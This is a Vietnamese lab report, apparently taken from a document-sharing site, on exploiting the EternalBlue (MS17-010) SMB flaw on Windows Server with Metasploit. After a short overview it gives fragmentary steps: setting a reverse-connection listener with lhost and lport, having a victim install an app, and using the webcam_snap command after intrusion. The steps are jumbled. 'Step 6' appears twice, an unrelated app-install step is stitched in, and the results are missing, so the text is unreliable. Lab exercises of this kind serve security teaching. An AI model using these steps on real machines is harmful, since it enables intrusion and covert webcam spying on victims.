Professional Documents
Culture Documents
Báo Cáo Lab
Báo Cáo Lab
Gõ lệnh help để biết thêm về các lệnh tấn công. Sau đó thực hiện tấn công.
LAB 2
Khai thác EternalBlue trên Windows Server bằng
Metasploit
1. Tổng quan
EternalBlue, còn được gọi là MS17-010 , là một lỗ hổng trong giao thức SMB
( Server Message Block ) của Microsoft . SMB cho phép các hệ thống chia sẻ quyền
truy cập vào các tệp, máy in và các tài nguyên khác trên mạng. Lỗ hổng được phép
xảy ra vì các phiên bản trước của SMB có một lỗ hổng cho phép kẻ tấn công thiết
lập kết nối phiên null thông qua đăng nhập ẩn danh. Kẻ tấn công sau đó có thể gửi
các gói không đúng định dạng và cuối cùng thực hiện các lệnh tùy ý trên mục tiêu.
Bước 6: Đặt máy chủ nghe thành địa chỉ IP của máy cục bộ của chúng ta bằng lệnh
set lhost 192.168.112.129
Set port : set lport 4331
Bước 6: Tiến hành tải app và cài đặt trên máy ảo hoặc máy thực bằng nhiều cách
khác nhau
Sau khi cài đặt thì chúng ta sẽ thực hiện khai thác máy nạn nhân bằng cách dùng
lệnh ? để xem nhiều lệnh khác nhau và thực hiện theo các lệnh đó.
Kết quả:
Sau khi xâm nhập thành công chúng ta có thể dùng nhiều lệnh khác nhau để kiểm
tra ví dụ như lệnh webcam_snap ta được kết quả sau: